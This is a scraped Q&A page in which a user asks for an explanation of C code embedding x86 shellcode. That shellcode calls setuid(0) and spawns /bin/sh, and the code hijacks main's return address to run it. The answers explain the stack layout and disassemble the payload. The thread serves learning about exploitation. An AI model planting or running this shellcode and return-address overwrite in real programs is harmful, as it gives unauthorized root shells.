Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

can anyone explain this code to me?

WARNING: This is an exploit. Do not execute this code.

//shellcode.c

char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main() { 
    int *ret; //ret pointer for manipulating saved return.

    ret = (int *)&ret + 2; //setret to point to the saved return
                           //value on the stack.

    (*ret) = (int)shellcode; //change the saved return value to the
                             //address of the shellcode, so it executes.
}

can anyone give me a better explanation ?

like image 291
0xab3d Avatar asked Apr 24 '10 19:04

0xab3d


People also ask

Is there a website that explains code?

Helping developers break through. the enigma of codeDenigma explains code in understandable english. Powered by machine learning.

How do you explain someone's code?

Explain the code in the same language the users use. Explain the code using standard programmer terms, e.g. Terms like "buffer", "list", "singleton" are familiar to most of us, as are common mathematical terms. Explain what you're doing in terms of the inputs and outputs.

What is code short answer?

In computer programming, computer code refers to the set of instructions, or a system of rules, written in a particular programming language (i.e., the source code). It is also the term used for the source code after it has been processed by a compiler and made ready to run on the computer (i.e., the object code).


2 Answers

Apparently, this code attempts to change the stack so that when the main function returns, program execution does not return regularly into the runtime library (which would normally terminate the program), but would jump instead into the code saved in the shellcode array.

1) int *ret;

defines a variable on the stack, just beneath the main function's arguments.

2) ret = (int *)&ret + 2;

lets the ret variable point to a int * that is placed two ints above ret on the stack. Supposedly that's where the return address is located where the program will continue when main returns.

2) (*ret) = (int)shellcode;

The return address is set to the address of the shellcode array's contents, so that shellcode's contents will be executed when main returns.


shellcode seemingly contains machine instructions that possibly do a system call to launch /bin/sh. I could be wrong on this as I didn't actually disassemble shellcode.


P.S.: This code is machine- and compiler-dependent and will possibly not work on all platforms.


Reply to your second question:

and what happens if I use ret=(int)&ret +2 and why did we add 2? why not 3 or 4??? and I think that int is 4 bytes so 2 will be 8bytes no?

ret is declared as an int*, therefore assigning an int (such as (int)&ret) to it would be an error. As to why 2 is added and not any other number: apparently because this code assumes that the return address will lie at that location on the stack. Consider the following:

  • This code assumes that the call stack grows downward when something is pushed on it (as it indeed does e.g. with Intel processors). That is the reason why a number is added and not subtracted: the return address lies at a higher memory address than automatic (local) variables (such as ret).

  • From what I remember from my Intel assembly days, a C function is often called like this: First, all arguments are pushed onto the stack in reverse order (right to left). Then, the function is called. The return address is thus pushed on the stack. Then, a new stack frame is set up, which includes pushing the ebp register onto the stack. Then, local variables are set up on the stack beneath all that has been pushed onto it up to this point.

Now I assume the following stack layout for your program:

+-------------------------+
|  function arguments     |                       |
|  (e.g. argv, argc)      |                       |  (note: the stack
+-------------------------+   <-- ss:esp + 12     |   grows downward!)
|  return address         |                       |
+-------------------------+   <-- ss:esp + 8      V
|  saved ebp register     |                       
+-------------------------+   <-- ss:esp + 4  /  ss:ebp - 0  (see code below)
|  local variable (ret)   |                       
+-------------------------+   <-- ss:esp + 0  /  ss:ebp - 4

At the bottom lies ret (which is a 32-bit integer). Above it is the saved ebp register (which is also 32 bits wide). Above that is the 32-bit return address. (Above that would be main's arguments -- argc and argv -- but these aren't important here.) When the function executes, the stack pointer points at ret. The return address lies 64 bits "above" ret, which corresponds to the + 2 in

ret = (int*)&ret + 2; 

It is + 2 because ret is a int*, and an int is 32 bit, therefore adding 2 means setting it to a memory location 2 × 32 bits (=64 bits) above (int*)&ret... which would be the return address' location, if all the assumptions in the above paragraph are correct.


Excursion: Let me demonstrate in Intel assembly language how a C function might be called (if I remember correctly -- I'm no guru on this topic so I might be wrong):

// first, push all function arguments on the stack in reverse order:
push  argv
push  argc

// then, call the function; this will push the current execution address
// on the stack so that a return instruction can get back here:
call  main

// (afterwards: clean up stack by removing the function arguments, e.g.:)
add   esp, 8

Inside main, the following might happen:

// create a new stack frame and make room for local variables:
push  ebp
mov   ebp, esp
sub   esp, 4

// access return address:
mov   edi, ss:[ebp+4]

// access argument 'argc'
mov   eax, ss:[ebp+8]

// access argument 'argv'
mov   ebx, ss:[ebp+12]

// access local variable 'ret'
mov   edx, ss:[ebp-4]

...

// restore stack frame and return to caller (by popping the return address)
mov   esp, ebp
pop   ebp
retf

See also: Description of the procedure call sequence in C for another explanation of this topic.

like image 86
stakx - no longer contributing Avatar answered Sep 20 '22 16:09

stakx - no longer contributing


The actual shellcode is:

(gdb) x /25i &shellcode
0x804a040 <shellcode>:      xor    %eax,%eax
0x804a042 <shellcode+2>:    xor    %ebx,%ebx
0x804a044 <shellcode+4>:    mov    $0x17,%al
0x804a046 <shellcode+6>:    int    $0x80
0x804a048 <shellcode+8>:    jmp    0x804a069 <shellcode+41>
0x804a04a <shellcode+10>:   pop    %esi
0x804a04b <shellcode+11>:   mov    %esi,0x8(%esi)
0x804a04e <shellcode+14>:   xor    %eax,%eax
0x804a050 <shellcode+16>:   mov    %al,0x7(%esi)
0x804a053 <shellcode+19>:   mov    %eax,0xc(%esi)
0x804a056 <shellcode+22>:   mov    $0xb,%al
0x804a058 <shellcode+24>:   mov    %esi,%ebx
0x804a05a <shellcode+26>:   lea    0x8(%esi),%ecx
0x804a05d <shellcode+29>:   lea    0xc(%esi),%edx
0x804a060 <shellcode+32>:   int    $0x80
0x804a062 <shellcode+34>:   xor    %ebx,%ebx
0x804a064 <shellcode+36>:   mov    %ebx,%eax
0x804a066 <shellcode+38>:   inc    %eax
0x804a067 <shellcode+39>:   int    $0x80
0x804a069 <shellcode+41>:   call   0x804a04a <shellcode+10>
0x804a06e <shellcode+46>:   das    
0x804a06f <shellcode+47>:   bound  %ebp,0x6e(%ecx)
0x804a072 <shellcode+50>:   das    
0x804a073 <shellcode+51>:   jae    0x804a0dd
0x804a075 <shellcode+53>:   add    %al,(%eax)

This corresponds to roughly

setuid(0);
x[0] = "/bin/sh"
x[1] = 0;
execve("/bin/sh", &x[0], &x[1])
exit(0);
like image 37
Chris Dodd Avatar answered Sep 19 '22 16:09

Chris Dodd